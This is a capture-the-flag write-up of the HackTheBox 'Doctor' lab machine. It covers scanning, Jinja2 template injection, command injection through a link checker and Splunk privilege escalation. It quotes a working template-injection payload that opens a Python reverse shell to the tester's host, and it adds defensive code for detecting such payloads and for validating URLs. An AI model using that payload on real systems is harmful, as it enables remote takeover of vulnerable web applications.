Doctor | HTB | OSCP | Box 3

Part of TJ Null OSCP Box Series

Tanzil Rehman


Enumeration

NMAP

┌──(root💀kali)-[/home/kali/htb/doctor]
└─# nmap -A -sV -sC -O -p- 10.10.10.209
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 15:43 EDT
Nmap scan report for 10.10.10.209
Host is up (0.093s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
| 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (92%), Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Crestron XPanel control system (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.4 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 95.39 ms 10.10.14.1
2 96.46 ms 10.10.10.209
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.38 seconds

The following commands are also part of the enumeration approach:

>nmap --script vuln -p 22,80,8089 10.10.10.209
>nmap -sU -A -p 1-1000 10.10.10.209

Port 22

  • SSH is running on it.
  • I'm not aware of any known vulnerabilities for it, so I would start with the web server, since web servers have a larger attack surface.

Port 80

Starting with the index page:

It is a proper website. I enumerated every link and tab; they all redirect to the same homepage.

Then I reviewed the source code of the website; at this point there was no lead.

However, I did find a domain name: doctors.htb

I added this domain to the /etc/hosts file on my Kali machine.

Upon visiting it, I found a login page.

I tried to log in with info@doctors.htb, admin@doctors.htb, etc., but was unable to log in, as I didn't have the credentials. I signed up for a new account and was then able to log in.

Directory and Subdomain Brute Force

I ran the following tools to find subdomains or directories.

  • Wfuzz wasn't able to find any subdomains
  • Feroxbuster on doctors.htb
  • Feroxbuster on 10.10.10.209

Nothing interesting was found.

Port 8089

Splunk is running on it. I found some interesting tools, but I didn't have credentials, so they didn't work.

I tried some default and easy admin:password pairs, but none worked.

I used the tools from this repo, and there is a good article that explains the context.

Exploitation / Initial Foothold

I found my way into this box through the following two methods:

  1. Server-Side Template Injection (SSTI)
  2. Command Injection

Server-Side Template Injection (SSTI)

Testing for SSTI has three stages: detect it, identify the template engine, and exploit it.

As we add more data through the "post new message" tab, /archive dynamically renders it. This shows that /archive is a template, and that a template engine in the backend takes the data from the post and inserts it into the template.

According to the template-engine identification table, the engine is Jinja2.

What is Jinja2? Jinja is a web template engine for the Python programming language.

This is an excellent repo for SSTI payloads. I took the reverse shell payload from it:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.3\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
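As an added detection example (not part of the original write-up): a small triage script for the application's post submissions that separates a detection-stage probe such as {{7*7}} from a sandbox-escape payload of the kind quoted above. The regexes, function names and sample bodies are my own constructions.

```python
import re
from typing import Dict
from urllib.parse import unquote_plus

# Stage 1 of the SSTI methodology: an arithmetic probe such as {{7*7}} that
# renders as 49 when the template engine evaluates user input.
PROBE_RE = re.compile(r"\{\{\s*\d+\s*[*+\-/]\s*\d+\s*\}\}")
# Jinja2 statement blocks ({% for ... %}) have no business in a patient's post.
STATEMENT_RE = re.compile(r"\{%.*?%\}", re.S)
# Stage 3: walking the Python object graph out of the template context.
ESCAPE_RE = re.compile(
    r"__class__|__base__|__subclasses__|__builtins__|__import__|__globals__|_module"
)
OS_RE = re.compile(r"\b(popen|system|subprocess)\b")


def classify_submission(body: str) -> str:
    """Return 'clean', 'probe' or 'exploit' for one user-submitted post body.

    The body is URL-decoded first so an encoded payload is judged the same
    way as a plain one. Jinja2 syntax is case-sensitive, so no lowercasing.
    """
    text = unquote_plus(body)
    if ESCAPE_RE.search(text) and (OS_RE.search(text) or STATEMENT_RE.search(text)):
        return "exploit"
    if PROBE_RE.search(text) or STATEMENT_RE.search(text):
        return "probe"
    return "clean"


def triage_posts(bodies: Dict[str, str]) -> Dict[str, str]:
    """Map post id -> verdict for every post that is not clean."""
    verdicts = {pid: classify_submission(b) for pid, b in bodies.items()}
    return {pid: v for pid, v in verdicts.items() if v != "clean"}


# Constructed sample bodies (not captured traffic): a normal post, the classic
# arithmetic probe as a form field, and a URL-encoded Jinja2 object-graph walk
# of the kind quoted above, with the command part left out.
SAMPLES = {
    "hello": "Dr. Smith is available on Mondays",
    "probe": "title={{7*7}}",
    "escape": "{%25 for x in ().__class__.__base__.__subclasses__() %25}"
              "{{ x.__name__ }}{%25 endfor %25}",
}

if __name__ == "__main__":
    print(triage_posts(SAMPLES))
```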

Command Injection

I started by submitting a link pointing to my own server to see whether it would get a hit.

The moment I hit submit, I got a hit.

When I stopped the server, the link was reported as invalid.

So this time, instead of a web server, I opened a netcat listener.

The link was again shown as invalid in the doctors.htb panel, but I got the following on the listener:

There is curl in action behind the scenes, even though the template injection showed us a Python template engine running in the backend.

I tried several other methods and alterations until I found one that worked for me.

This one didn't work!

I was unable to cat user.txt.
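As an added defender-side example (not the box's own code): how a link checker like the one behind the scenes should handle a submitted URL, validating it and passing it to curl as a single argv element instead of a shell string. The validate_link/build_curl_argv names and the curl option set are assumptions.

```python
import subprocess
from typing import List
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Characters a pasted URL never needs and that would matter if the value ever
# reached a shell: a conservative allow-list beats an escaping routine.
FORBIDDEN = set("`$;|&<>\"'\\{}()") | {chr(c) for c in range(0x20)}


def validate_link(url: str) -> str:
    """Return the URL unchanged if it is a plain absolute http(s) URL, else raise.

    urlsplit() only parses: it accepts metacharacters, control characters,
    file:// and an embedded user:pass@, so each is checked explicitly.
    """
    if not url or len(url) > 2048:
        raise ValueError("empty or oversized URL")
    bad = sorted(set(url) & FORBIDDEN)
    if bad:
        raise ValueError(f"disallowed characters in URL: {bad}")
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname or "@" in parts.netloc:
        raise ValueError("missing host or embedded credentials")
    return url


def is_safe_link(url: str) -> bool:
    try:
        validate_link(url)
        return True
    except ValueError:
        return False


def build_curl_argv(url: str) -> List[str]:
    """Argument list for the checker: no shell, so the URL is one argv element.

    The scheme check also guarantees the URL cannot start with '-' and be
    read by curl as an option. Option set is an assumed, minimal one.
    """
    return ["curl", "-sS", "--max-time", "5", "--max-redirs", "0",
            "-o", "/dev/null", "-w", "%{http_code}", validate_link(url)]


def check_link(url: str) -> str:
    """Run the validated check and return the HTTP status code as text."""
    proc = subprocess.run(build_curl_argv(url), capture_output=True,
                          text=True, timeout=10, check=False)
    return proc.stdout.strip()
```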

Shell as Shaun

The web user is part of the adm group.

The adm group gives the privilege to read most log files.

When I ran linpeas, I found the password of the Shaun user.

User.txt

Privilege Escalation

Now that we have Shaun's credentials, let's see if we can access Splunk on port 8089.

Using the Splunk exploitation tool from this repo:

I got a hit on my web server.

Let’s run a reverse shell.

Root.txt
